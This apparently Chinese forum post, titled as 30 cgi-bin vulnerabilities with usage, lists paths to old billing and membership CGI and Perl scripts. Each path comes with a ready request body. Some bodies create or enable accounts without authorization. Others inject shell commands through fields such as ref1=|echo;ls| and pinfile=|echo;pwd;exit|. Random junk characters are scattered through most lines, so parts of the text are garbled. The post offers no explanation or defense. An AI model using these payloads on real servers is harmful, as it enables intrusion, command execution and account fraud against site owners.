Cgi-bin 30个漏洞＋使用方法

admin

==============================
9 G1 S1 E% x, \% B
7 q( O1 S$ `+ T! t" W- o/smspass.pl
username=username&password=password
# T9 V" n: f" M
7 d1 q& m. a  t# a3 X/index.cgi
: q" `" y# `6 p: U% q1 Y& a; qwei=ren&gen=command
8 {+ y5 u0 x! w" ~! {9 y$ |
/passmaster.cgi
0 Z( a* f. s# }/ bAction=Add&Username=Username&Password=Password

& `; |2 h) t) w' h4 i/accountcreate.cgi
username=username&password=password&ref1=|echo;ls|
3 p" d: [+ Y. E# @4 W' n2 n
, Z: i" y9 L7 |8 a* w& e+ I# I2 C, f/form.cgi
name=xxxx&email=email&subject=xxxx&response=|echo;ls|
$ u- u8 h6 U  n
/addusr.pl
+ c6 t. S. ~* |: e0 v/cgi-bin/EuroDebit/addusr.pl
$ q, L1 s! Y: w1 C$ T$ ]user=username&pass=Password&confirm=Password
6 Z2 M- Z- e/ M4 W8 H! M5 [
) @! I( i# I% J, |' s% t/ccbill-local.asp
- h; y. x/ M5 p; y2 i! Wpost_values=username:password

6 _) [7 z6 a) S) m/count.cgi
pinfile=|echo;ls -la;exit|
+ o7 J2 A6 x$ ~+ b# ?. x/ K
/recon.cgi
/recon.cgi?search
searchoption=1&searchfor=|echo;ls -al;exit|
; ~' C3 S/ E4 g: u& k, d
3 A( X& R) b! t/ ~9 r/verotelrum.pl
2 {1 j3 }4 r) Z; c( U6 t0 `vercode=username:password:dseegsow:add:amount<&30>
. v# g; o4 m: j7 Y1 G
/af.cgi
_browser_out=|echo;ls -la;exit;|
  {3 G' c& U* w2 P6 v4 E6 j
& N0 |4 M/ W1 Z3 f3 y# [+ s/modify.cgi
username=username&password=password&expire=30

$ A, q* o4 O4 x2 H/openjournal.cgi
9 f* D  F* Y- Y: |0 gedit=1&ct=2&go=|echo;ls -al;exit|

/gx9passwd.cgi
cmd=ADD&user=username&pass=password
" s5 P: V7 k8 K% ~% W  ~5 W
/probecontrol.cgi
+ B+ |, W, ~' S3 U, @command=enable&username=username&password=password
9 V  s6 S7 ^$ M
/recon.cgi
searchoption=3&searchfor=echo;ls -la;exit
9 m1 w$ \3 ^2 q
( U/ V% c! f3 W$ p/htadd.pl
5 o# D: p, Y3 s) |1 A8 w; iconfigfile=|echo; ls -alt; exit
" p" |  g+ I  I# s3 o$ l
4 c! l# k0 {& A- @9 R7 ^0 h  A/gx9passwd.cgi
+ `1 }0 f. m/ w$ F" dcmd=ADD&user=username&pass=password

/ibill*.pl
" P, l8 n" s- Preqtype=add&authpwd=authpwd&username=username&password=password

) L0 |( S- S/ W2 N+ s  Y3 d/cpay.cgi
command=add_member&username=username(EMAIL)&password=password(DES)

/globill_ut.cgi
do=add&username=username&password=password&wpassword=password

" X4 h3 i/ F7 G6 A0 j: O- Z; [: k/usercontrol.cgi
command=enable&username=USER&password=PASS

/globoSALErum.cgi
% k" R, O1 I2 F4 I* ~; H& W) paction=ADD&seccode=seccode&login=username&password=password
* D1 U/ a$ H1 [$ l3 k
/addusr.pl
user=USER&pass=PASS&confirm=PASS

/pincount.cgi
/cgi-bin/mastergate/pincount.cgi
pinfile=|echo;pwd;exit|

' Q: k' D' t' l# {3 x: Y0 p: \/accountcreate.cgi
- m7 ?' N; M3 ^/cgi-bin/gateway/accountcreate.cgi
username=username&password=password&password2=password&ref1=|echo;ls -al;exit
  |* b* G& T: V" q( v8 W
/af.cgi
) t$ e' }  r2 V' ^2 Z/env.cgi
ADD+;echo;pwd;exit
9 P# n, [, v8 h
- Q. V- ?, l3 C/count.cgi
pinfile=|echo;pwd;exit|
* F9 A* j) F$ |9 s% R& z
( }( ~% U" L1 e7 C. |' A9 i$ U/recon.cgi
searchoption=1&searchfor=|echo;ls%20-al;exit|
$ J; U% ]% w6 Q
/add.cgi
username=username&password=password&expire=30

==============================
1 ^- S2 s) _) P6 g7 p